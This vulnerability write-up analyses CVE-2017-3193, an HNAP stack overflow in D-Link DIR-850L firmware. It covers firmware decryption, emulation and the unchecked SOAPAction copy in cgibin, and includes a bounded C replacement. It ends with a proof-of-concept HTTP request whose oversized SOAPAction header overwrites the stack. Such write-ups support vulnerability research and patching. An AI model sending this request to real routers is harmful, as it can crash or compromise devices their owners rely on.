CVE-2017-3193
CVE-2017-3193 is a stack overflow in the HNAP service of the router's web management interface; DIR-850L firmware 2.07 build 5 and earlier can be attacked.
Environment setup
Download the firmware from D-Link's official FTP server:
DIR-850L_REVB_FIRMWARE_2.07.B05_WW.ZIP
Analyzing it with binwalk yields nothing, so the firmware is presumably encrypted; it can be decrypted with the script from the article Pwning the Dlink 850L routers and abusing the MyDlink Cloud protocol.
After decryption, binwalk extracts the contents successfully.

The firmware was emulated with firmware-analysis-toolkit.

Vulnerability analysis
The vulnerable program is squashfs-root/htdocs/cgibin.
Locate the reference to HTTP_SOAPACTION and examine it.

Here the value of HTTP_SOAPACTION is fetched from the environment and written onto the stack without any length check, which causes the stack overflow.
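As an added example (not the cgibin code from the firmware), this is the bounded handling that the vulnerable path lacks: the header value is read from HTTP_SOAPACTION, length- and character-checked, and only then copied into the fixed stack buffer. The buffer size, status codes and function names are assumptions made for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SOAPACTION_MAX 256   /* assumed bound for a legitimate HNAP action URI */
enum soap_status { SOAP_OK = 0, SOAP_MISSING = -1, SOAP_TOO_LONG = -2, SOAP_BAD_CHAR = -3 };

/* The pattern the page describes is, in effect,
 *     char action[N]; strcpy(action, getenv("HTTP_SOAPACTION"));
 * with no bound on the header length. This bounded replacement copies `value`
 * into `out` (capacity `outlen`) only if it fits and is printable ASCII. */
int copy_soapaction(const char *value, char *out, size_t outlen)
{
    if (value == NULL)
        return SOAP_MISSING;
    /* Scan at most outlen bytes: an oversized header is never walked past the limit. */
    size_t n = 0;
    for (; n < outlen && value[n] != '\0'; n++) {
        unsigned char c = (unsigned char)value[n];
        if (c < 0x20 || c > 0x7e)        /* rejects CR/LF and binary junk */
            return SOAP_BAD_CHAR;
    }
    if (n >= outlen)                     /* no room left for the terminator */
        return SOAP_TOO_LONG;
    memcpy(out, value, n);
    out[n] = '\0';
    return SOAP_OK;
}

/* Validation-only wrapper: classifies a header value without keeping it. */
int soapaction_status(const char *value)
{
    char tmp[SOAPACTION_MAX];
    return copy_soapaction(value, tmp, sizeof tmp);
}

/* CGI entry point: the web server exports the SOAPAction header as the
 * HTTP_SOAPACTION environment variable, which is where cgibin reads it. */
int handle_hnap_request(void)
{
    char action[SOAPACTION_MAX];         /* the fixed stack buffer being protected */
    int rc = copy_soapaction(getenv("HTTP_SOAPACTION"), action, sizeof action);
    if (rc != SOAP_OK) {
        printf("Status: 400 Bad Request\r\n\r\nbad SOAPAction (%d)\n", rc);
        return rc;
    }
    printf("Status: 200 OK\r\nContent-Type: text/plain\r\n\r\naction=%s\n", action);
    return SOAP_OK;
}
```

A request like the PoC below, with a header far longer than SOAPACTION_MAX, is answered with a 400 instead of overwriting the return address.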
PoC
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/info/Login.html
SOAPAction: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAAAA
Cookie: uid=vdgBn8ibbO
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 0
